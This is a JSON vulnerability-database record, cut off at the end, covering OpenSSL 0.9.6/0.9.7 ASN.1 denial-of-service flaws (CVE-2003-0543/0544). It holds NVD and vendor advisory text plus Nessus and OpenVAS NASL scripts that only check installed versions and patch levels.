{"id": "OPENSSL_0_9_6K.NASL", "bulletinFamily": "scanner", "title": "OpenSSL < 0.9.6k Denial of Service", "description": "According to its banner, the remote server is running a version of\nOpenSSL that is earlier than 0.9.6k. \n\nA remote attacker can trigger a denial of service by using an invalid\nclient certificate.", "published": "2012-01-04T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/17748", "reporter": "This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.", "references": [], "cvelist": ["CVE-2003-0544", "CVE-2003-0543"], "type": "nessus", "lastseen": "2021-01-01T04:32:55", "edition": 25, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0543", "CVE-2003-0544"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2003-0544", "OPENSSL:CVE-2003-0543"]}, {"type": "redhat", "idList": ["RHSA-2003:293"]}, {"type": "openvas", "idList": ["OPENVAS:835123", "OPENVAS:835108", "OPENVAS:1361412562310835123", "OPENVAS:835007", "OPENVAS:53677", "OPENVAS:1361412562310835108", "OPENVAS:53375", "OPENVAS:1361412562310835007"]}, {"type": "debian", "idList": ["DEBIAN:DSA-394-1:84FAE", "DEBIAN:DSA-393-1:6D39D"]}, {"type": "nessus", "idList": ["HPUX_PHSS_29891.NASL", "DEBIAN_DSA-393.NASL", "REDHAT-RHSA-2003-293.NASL", "HPUX_PHSS_30058.NASL", "HPUX_PHSS_30056.NASL", "HPUX_PHSS_30057.NASL", "HPUX_PHSS_29893.NASL", "DEBIAN_DSA-394.NASL", "MANDRAKE_MDKSA-2003-098.NASL", "HPUX_PHSS_29691.NASL"]}, {"type": "suse", "idList": ["SUSE-SA:2003:043"]}, {"type": "cert", "idList": ["VU:104280", "VU:380864", "VU:255484"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:5177", "SECURITYVULNS:DOC:5178", "SECURITYVULNS:DOC:5186"]}, {"type": "cisco", "idList": ["CISCO-SA-20030930-SSL"]}, {"type": "osvdb", "idList": ["OSVDB:3949", "OSVDB:3686"]}, {"type": "exploitdb", "idList": ["EDB-ID:146"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4581", "ELSA-2015-3022", "ELSA-2019-4747"]}], "modified": "2021-01-01T04:32:55", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-01-01T04:32:55", "rev": 2}, "vulnersScore": 6.2}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17748);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/16 14:09:14\");\n\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\");\n script_bugtraq_id(8732);\n script_xref(name:\"CERT-CC\", value:\"CA-2003-26\");\n script_xref(name:\"CERT\", value:\"255484\");\n script_xref(name:\"CERT\", value:\"380864\");\n\n script_name(english:\"OpenSSL < 0.9.6k Denial of Service\");\n script_summary(english:\"Does a banner check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote server is vulnerable to a denial of service attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the remote server is running a version of\nOpenSSL that is earlier than 0.9.6k. \n\nA remote attacker can trigger a denial of service by using an invalid\nclient certificate.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to OpenSSL 0.9.6k or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/09/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"openssl_version.nasl\");\n script_require_keys(\"openssl/port\");\n\n exit(0);\n}\n\ninclude(\"openssl_version.inc\");\n\nopenssl_check_version(fixed:'0.9.6k', severity:SECURITY_WARNING);\n", "naslFamily": "Web Servers", "pluginID": "17748", "cpe": ["cpe:/a:openssl:openssl"], "scheme": null}

{"cve": [{"lastseen": "2020-10-03T11:33:02", "description": "OpenSSL 0.9.6 and 0.9.7 does not properly track the number of characters in certain ASN.1 inputs, which allows remote attackers to cause a denial of service (crash) via an SSL client certificate that causes OpenSSL to read past the end of a buffer when the long form is used.", "edition": 3, "cvss3": {}, "published": "2003-11-17T05:00:00", "title": "CVE-2003-0544", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0544"], "modified": "2018-05-03T01:29:00", "cpe": ["cpe:/a:openssl:openssl:0.9.6", "cpe:/a:openssl:openssl:0.9.7"], "id": "CVE-2003-0544", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0544", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:openssl:openssl:0.9.7:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.6:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:33:02", "description": "Integer overflow in OpenSSL 0.9.6 and 0.9.7 allows remote attackers to cause a denial of service (crash) via an SSL client certificate with certain ASN.1 tag values.", "edition": 3, "cvss3": {}, "published": "2003-11-17T05:00:00", "title": "CVE-2003-0543", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0543"], "modified": "2018-05-03T01:29:00", "cpe": ["cpe:/a:openssl:openssl:0.9.6", "cpe:/a:openssl:openssl:0.9.7"], "id": "CVE-2003-0543", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0543", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:openssl:openssl:0.9.7:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.6:*:*:*:*:*:*:*"]}], "openssl": [{"lastseen": "2020-09-14T11:36:56", "bulletinFamily": "software", "cvelist": ["CVE-2003-0544"], "description": " Incorrect tracking of the number of characters in certain ASN.1 inputs could allow remote attackers to cause a denial of service (crash) by sending an SSL client certificate that causes OpenSSL to read past the end of a buffer when the long form is used. Reported by NISCC. \n\n * Fixed in OpenSSL 0.9.7c (Affected 0.9.7-0.9.7b)\n * Fixed in OpenSSL 0.9.6k (Affected 0.9.6-0.9.6j)\n", "edition": 1, "modified": "2003-09-30T00:00:00", "published": "2003-09-30T00:00:00", "id": "OPENSSL:CVE-2003-0544", "href": "https://www.openssl.org/news/secadv/20030930.txt", "title": "Vulnerability in OpenSSL CVE-2003-0544", "type": "openssl", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-14T11:36:57", "bulletinFamily": "software", "cvelist": ["CVE-2003-0543"], "description": " An integer overflow could allow remote attackers to cause a denial of service (crash) via an SSL client certificate with certain ASN.1 tag values. Reported by NISCC. \n\n * Fixed in OpenSSL 0.9.7c (Affected 0.9.7-0.9.7b)\n * Fixed in OpenSSL 0.9.6k (Affected 0.9.6-0.9.6j)\n", "edition": 1, "modified": "2003-09-30T00:00:00", "published": "2003-09-30T00:00:00", "id": "OPENSSL:CVE-2003-0543", "href": "https://www.openssl.org/news/secadv/20030930.txt", "title": "Vulnerability in OpenSSL CVE-2003-0543", "type": "openssl", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:34", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0543", "CVE-2003-0544"], "description": "OpenSSL is a commercial-grade, full-featured, and open source toolkit that\nimplements Secure Sockets Layer (SSL v2/v3) and Transport Layer Security\n(TLS v1) protocols as well as a full-strength general purpose cryptography\nlibrary.\n\nNISCC testing of implementations of the SSL protocol uncovered two bugs in\nOpenSSL 0.9.6. The parsing of unusual ASN.1 tag values can cause OpenSSL to\ncrash. A remote attacker could trigger this bug by sending a carefully\ncrafted SSL client certificate to an application. The effects of such an\nattack vary depending on the application targetted; against Apache the\neffects are limited, as the attack would only cause child processes to die\nand be replaced. An attack against other applications that use OpenSSL\ncould result in a Denial of Service. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the names CAN-2003-0543 and\nCAN-2003-0544 to this issue.\n\nThese erratum packages contain a patch provided by the OpenSSL group that\nprotects against this issue.\n\nBecause server applications are affected by this issue, users are advised\nto either restart all services that use OpenSSL functionality or reboot\ntheir systems after installing these updates. \n\nRed Hat would like to thank NISCC and Stephen Henson for their work on this\nvulnerability.\n\nThese packages also include a patch from OpenSSL 0.9.6f which removes\nthe calls to abort the process in certain circumstances. Red Hat would\nlike to thank Patrik Hornik for notifying us of this issue.", "modified": "2018-03-14T19:27:12", "published": "2003-09-30T04:00:00", "id": "RHSA-2003:293", "href": "https://access.redhat.com/errata/RHSA-2003:293", "type": "redhat", "title": "(RHSA-2003:293) openssl security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:49:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543"], "description": "The remote host is missing an update to openssl\nannounced via advisory DSA 393-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53677", "href": "http://plugins.openvas.org/nasl.php?oid=53677", "type": "openvas", "title": "Debian Security Advisory DSA 393-1 (openssl)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_393_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 393-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Dr. Stephen Henson (steve@openssl.org), using a test suite provided by\nNISCC (www.niscc.gov.uk), discovered a number of errors in the OpenSSL\nASN1 code. Combined with an error that causes the OpenSSL code to parse\nclient certificates even when it should not, these errors can cause a\ndenial of service (DoS) condition on a system using the OpenSSL code,\ndepending on how that code is used. For example, even though apache-ssl\nand ssh link to OpenSSL libraries, they should not be affected by this\nvulnerability. However, other SSL-enabled applications may be\nvulnerable and an OpenSSL upgrade is recommended.\n\nFor the current stable distribution (woody) these problems have been\nfixed in version 0.9.6c-2.woody.4\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 0.9.7c-1\n\nWe recommend that you update your openssl package. Note that you will\nneed to restart services which use the libssl library for this update\nto take effect.\";\ntag_summary = \"The remote host is missing an update to openssl\nannounced via advisory DSA 393-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20393-1\";\n\nif(description)\n{\n script_id(53677);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 393-1 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ssleay\", ver:\"0.9.6c-2.woody.4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.6c-2.woody.4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.6\", ver:\"0.9.6c-2.woody.4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.6c-2.woody.4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "description": "Check for the Version of HP WEBM Services", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835108", "href": "http://plugins.openvas.org/nasl.php?oid=835108", "type": "openvas", "title": "HP-UX Update for HP WEBM Services HPSBUX00288", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for HP WEBM Services HPSBUX00288\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\";\ntag_affected = \"HP WEBM Services on\n HP-UX B.11.00 running HP WEBM versions prior to A.01.05.07 HP-UX B.11.11 and \n B.11.23 running HP WEBM versions prior to A.02.00.02\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-HX running \n HP WEBM Services. The vulnerabilities could be exploited remotely to create \n a Denial of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00891831-1\");\n script_id(835108);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"00288\");\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_name( \"HP-UX Update for HP WEBM Services HPSBUX00288\");\n\n script_summary(\"Check for the Version of HP WEBM Services\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"WBEMServices.WBEM-CORE\", revision:\"A.01.05.07\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"WBEMServices.WBEM-CORE\", revision:\"A.02.00.02\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"WBEMServices.WBEM-CORE\", revision:\"A.02.00.02\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "description": "Check for the Version of AAA Server", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835123", "href": "http://plugins.openvas.org/nasl.php?oid=835123", "type": "openvas", "title": "HP-UX Update for AAA Server HPSBUX00286", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for AAA Server HPSBUX00286\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\";\ntag_affected = \"AAA Server on\n HP-UX B.11.00 and B.11.11 running HP-UX AAA Server (T1428AA)\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX AAA \n Server. The vulnerability could be exploitedremotely to create a denial of \n service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00912021-1\");\n script_id(835123);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"00286\");\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_name( \"HP-UX Update for AAA Server HPSBUX00286\");\n\n script_summary(\"Check for the Version of AAA Server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"AAAServer\", revision:\"A.06.01.02.04\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"AAAServer\", revision:\"A.06.01.02.04\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "description": "Check for the Version of BIND v920", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835007", "href": "http://plugins.openvas.org/nasl.php?oid=835007", "type": "openvas", "title": "HP-UX Update for BIND v920 HPSBUX00290", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for BIND v920 HPSBUX00290\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\";\ntag_affected = \"BIND v920 on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23, running BINDv920.\";\ntag_insight = \"1. Certain ASN.1 encodings that are rejected as invalidby the parser can \n trigger a bug in the deallocationof the corresponding data structure, \n corrupting thestack. This can be used as a denial of serviceattack. It is \n currently unknown whether this can beexploited to run malicious code. This \n issue does notaffect OpenSSL 0.9.6.<br2. Unusual ASN.1 tag values can cause \n an out of boundsread under certain circumstances, resulting in adenial of \n service vulnerability.<br3. A malformed public key in a certificate will \n crashthe verify code if it is set to ignore public keydecoding errors. \n Exploitation of an affectedapplication would result in a denial of \n servicevulnerability.<br4. Due to an error in the SSL/TLS protocol \n handling,a server will parse a client certificate when one isnot \n specifically requested.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00901847-1\");\n script_id(835007);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"00290\");\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_name( \"HP-UX Update for BIND v920 HPSBUX00290\");\n\n script_summary(\"Check for the Version of BIND v920\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"BINDv920.INETSVCS-BIND\", revision:\"B.11.00.01.003\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.22\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS2-RUN\", patch_list:['PHNE_29859'], rls:\"HPUX11.22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"BINDv920.INETSVCS-BIND\", revision:\"B.11.11.01.005\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS2-RUN\", patch_list:['PHNE_31726'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "description": "Check for the Version of BIND v920", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:1361412562310835007", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835007", "type": "openvas", "title": "HP-UX Update for BIND v920 HPSBUX00290", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for BIND v920 HPSBUX00290\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if 